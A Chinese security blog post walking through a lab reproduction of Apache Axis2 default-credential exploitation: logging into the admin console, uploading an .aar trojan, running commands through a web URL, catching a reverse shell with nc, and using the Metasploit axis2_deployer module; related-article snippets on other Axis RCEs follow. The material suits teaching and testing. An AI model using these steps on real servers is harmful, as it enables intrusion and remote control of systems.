axis2弱密码漏洞复现

最新推荐文章于 2024-09-12 16:43:23 发布
最新推荐文章于 2024-09-12 16:43:23 发布
阅读量4.5k 收藏 2
点赞数 4
分类专栏: 网络攻击 msf 文章标签: 前端 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39583774/article/details/122036394
版权
本文详细介绍了Apache Axis2的一个安全漏洞,通过扫描器发现该漏洞允许未经验证的远程命令执行。作者演示了如何使用admin默认密码登录,上传aar木马文件,并通过执行特定命令反弹shell。此外,还展示了使用Meterpreter进行漏洞利用的过程。
摘要由CSDN通过智能技术生成

介绍

Axis2 Web 管理模块是一个下一代 Apache Axis。Axis2 虽然由 Axis 1.x 处理程序模型提供支持,但它具有更强的灵活性并可扩展到新的体系结构。Axis2 基于新的体系结构进行了全新编写,而且没有采用 Axis 1.x 的常用代码。支持开发 Axis2 的动力是探寻模块化更强、灵活性更高和更有效的体系结构,这种体系结构可以很容易地插入到其他相关 Web 服务标准和协议(如 WS-Security、WS-ReliableMessaging 等)的实现中。

环境介绍

主机IP
靶机192.168.30.134
kali192.168.30.128

靶机

链接:https://pan.baidu.com/s/1oz8LrApwYolS2orgJCT8yw 
提取码:1234

发现漏洞

使用扫描器发现漏洞,发现可以利用
在这里插入图片描述

开始复现

使用admin和默认密码登陆axis2。
在这里插入图片描述
发现漏洞上传点。

在这里插入图片描述
aar木马下载:

链接:https://pan.baidu.com/s/1_z6BQay90_TA1yURO9_z3A 
提取码:1234

上传木马文件
在这里插入图片描述

执行命令
http://192.168.30.134/axis2/services/Cat/exec?cmd=ifconfig

在这里插入图片描述

反弹shell

使用nc监听端口1111

nc -lvp 1111

在这里插入图片描述
使用命令进行反弹shell

http://192.168.30.134/axis2/services/Cat/shell?host=192.168.30.128&port=1111

在这里插入图片描述
在这里插入图片描述

Meterpreter复现

msfconsole 
use exploit/multi/http/axis2_deployer
msf6 exploit(multi/http/axis2_deployer) > set rhosts 192.168.30.134
msf6 exploit(multi/http/axis2_deployer) > set rport 80
msf6 exploit(multi/http/axis2_deployer) > exploit

在这里插入图片描述

0x717866
关注
专栏目录
用友GRP-U8 ReturnForWcp RCE漏洞复现
0xSec
11-16 1353
用友GRP-U8内控管理软件/servlet/PayReturnForWcp接口处存在xxe漏洞,攻击者可利用xxe漏洞组合内部axis组件的AdminService部署恶意类service,使用外部实体%name来加载"http://xxxx/services/AdminService?method=xx" 远程URL,调用javax.elELProcessor,部署成功后可写入恶意后门文件,可导致服务器失陷。
Java安全之Axis漏洞分析
m0_64354070的博客
11-29 2287
Java安全之Axis漏洞分析 0x00 前言 看到个别代码常出现里面有一些Axis组件,没去仔细研究过该漏洞。研究记录一下。 0x01 漏洞复现 漏洞版本:axis=<1.4 Axis1.4 freemarker 下载Axis包1.4版本将Axis放到tomcat的webapp目录中。freemarker.jar放到Axis的 lib目录下。运行tomcat即可。 WEB-INF/web.xml中将该配置取消注释 <servlet-mapping> &l...
WebService之Axis2 Log4j 2.x 漏洞升级教程
一个标题
01-12 1636
Axis2 Log4j 2.x 漏洞升级教程
利用Axis2默认口令安全漏洞可入侵WebService网站
weixin_33850015的博客
10-12 2050
利用Axis2默认口令安全漏洞可入侵WebService网站 近期,在乌云上关注了几则利用Axis2默认口令进行渗透测试的案例,大家的渗透思路基本一致,利用的技术工具也大致相同,我在总结这几则案例的基础之上进行了技术思路的拓展。 乌云Axis2默认口令安全点利用案例: 航空安全之四川航空某系统漏洞导致Getshell(影响内网60多台主机安全\目测已被其他人渗透过) 乐信通某服务器axis2服务...
信息泄漏篇
Ms08067安全实验室
05-29 1801
作者:实验室核心 cong1984 1、robots.txt泄漏敏感信息漏洞情况信息:搜索引擎可以通过robots文件可以获知哪些页面可以爬取,哪些页面不可以爬取。Robots协议是网...
一次真实axis2渗透测试
systemino的博客
08-04 1190
一 前言 最近在渗透测试中,遇到一个比较有趣的站,因此来分享一下 二 信息收集 首先通过nmap进行端口扫描,同时通过dirsearch进行目录扫描,dirsearch扫描结果如下。 通过目录扫描发现一些有用的信息 第一 axis2构建的webservice 第二 axis2的后台登录地址(/axis2/axis2-admin/)存在 google axis2漏洞,发现多半都是默认口令...
axis2组件漏洞问题
08-01
推荐版本1.7.5
Apache Axis 1.4 RCE CVE-2019-0227漏洞复现
热门推荐
qq_43697234的博客
07-21 1万+
Apache Axis 1.4 RCE CVE-2019-0227漏洞复现 漏洞产生原因: Axis 1.4 adminservice开启远程访问,此时攻击者可通过services/AdminService 服务 部署一个webservice ,webservice开启一个写文件服务 影响范围:Axis <=1.4 且enableRemoteAdmin设置为True 环境搭建:tomcat8.5+apache Axis 1.4 将apache Axis 1.4 下的webapps/axis包放到tom
Java axis 配置host_Apache Axis1 与 Axis2 WebService 的漏洞利用总结
weixin_30636329的博客
02-27 1361
作者:Longofo@知道创宇404实验室日期:2021年2月26日Apache Axis分为Axis1(一开始就是Axis,这里为了好区分叫Axis1)和Axis2,Axis1是比较老的版本了,在Axis1官方文档说到,Apache Axis1现在已经很大程度被Apache Axis2,Apache CXF和Metro取代,但是,Axis1仍与以下类型的项目相关:需要使用JAX-RPC的项目。该...
利用Axis2默认口令安全漏洞入侵WebService网站
weixin_33736832的博客
02-14 2902
近期,在黑吧安全网上关注了几则利用Axis2默认口令进行渗透测试的案例,大家的渗透思路基本一致,利用的技术工具也大致相同,我在总结这几则案例的基础之上进行了技术思路的拓展。黑吧安全Axis2默认口令安全点利用案例:航空安全之四川航空某系统漏洞导致Getshell(影响内网60多台主机安全\目测已被其他人渗透过)乐信通某服务器axis2服务存在口令可上传webshell(root权限)中国科学...
(CVE-2019-0227)Axis<=1.4 远程命令执行漏洞
m0_59598029的博客
01-24 2623
[图片](https://img-一、漏洞介绍漏洞本质是管理员对AdminService的配置错误。当enableRemoteAdmin属性设置为true时,攻击者可以构造调用freemarker组件中的template.utility.Execute类,远程利用AdminService接口进行WebService发布,再次访问生成的WebService接口,传入要执行的命令,就可以进行远程命令执行漏洞的利用。
axis2客户端调用服务端,带用户身份认证
05-06
在IT行业中,尤其是在Web服务开发领域,Axis2是一个广泛应用的SOAP(简单对象访问协议)服务框架,它由Apache软件基金会开发。Axis2提供了一种高效、灵活且可扩展的方式来实现服务端和客户端的服务调用。当涉及到...
axis2相关的jar包
12-22
axis2-adb-1.5.4.jar axis2-adb-codegen-1.5.4.jar axis2-codegen-1.5.4.jar axis2-corba-1.5.4.jar axis2-fastinfoset-1.5.4.jar axis2-java2wsdl-1.5.4.jar axis2-jaxbri-1.5.4.jar axis2-jaxws-1.5.4.jar axis2-...
Axis1.4 远程命令执行(CVE-2019-0227)复现
thelostworld
05-12 3607
一、漏洞介绍漏洞本质是管理员对AdminService的配置错误。当enableRemoteAdmin属性设置为true时,攻击者可以构造WebService调用freemarker组件中的template.utility.Execute类,远程利用AdminService接口进行WebService发布,再次访问生成的WebService接口,传入要执行的命令,就可以进行远程命令执行漏洞的利用。二、影响版本Axis <=1.4三、环境准备方法一:https://mirrors.tuna.tsingh
java 远程执行linux命令_Axis1.4 远程命令执行(CVE20190227)复现
weixin_39618456的博客
11-29 131
一、漏洞介绍漏洞本质是管理员对AdminService的配置错误。当enableRemoteAdmin属性设置为true时,攻击者可以构造WebService调用freemarker组件中的template.utility.Execute类,远程利用AdminService接口进行WebService发布,再次访问生成的WebService接口,传入要执行的命令,就可以进行远程命令执行漏...
Axis搭建加漏洞RCE(含CVE-2019-0227)
GalaxySpaceX的博客
05-15 2704
Axis漏洞RCE,包含CVE-2019-0227
Vue使用query传参Boolean类型,刷新之后转换为String问题
最新发布
q879936814的博客
09-12 361
要解决这个问题,不能直接Boolean处理,因为如果传入false,那么转换成字符串,Boolean(‘false’)会变成true;做项目时发现第一次进入页面时传参是正常的Boolean类型,刷新之后变成了String,这是浏览器进行的一次强制转换;解决方法:使用JSON.parse处理参数。
axis2 视频教程
12-31
Axis2 是一个流行的开源的 Web 服务框架,它提供了一个简单而强大的方式来构建和部署 Web 服务。由于其灵活性和功能丰富的特性,许多开发者都希望学习并掌握 Axis2 的使用。为了满足这一需求,许多教育平台和个人博客都提供了 Axis2 的视频教程。 Axis2 视频教程通常包括以下内容:介绍 Axis2 的基本概念和架构,演示如何安装和配置 Axis2 环境,创建和部署简单的 Web 服务,以及如何利用 Axis2 的高级特性来实现复杂的功能。通过视频教程,观众可以清晰地看到操作过程,更容易理解和掌握 Axis2 的使用方法。 值得注意的是,由于 Axis2 是一个功能强大且复杂的框架,因此视频教程通常会以模块化的方式展示,每个视频都会重点介绍一个特定的主题或功能。这样可以使学习者更有针对性地选择他们感兴趣的内容进行学习,并且便于反复观看和复习。 除了基本的概念和操作指南,一些视频教程还会提供实际的案例分析和实战演练,帮助学习者将理论知识应用到实际项目中。这种实践性的学习方式更有利于学习者的掌握和运用。 总之,Axis2 视频教程为学习者提供了一个高效、直观的学习途径,帮助他们快速入门并掌握 Axis2 的使用技巧。希望学习者能够通过视频教程的学习,掌握 Axis2 的核心概念和高级功能,为自己的技术能力提升打下坚实的基础。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0x717866

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值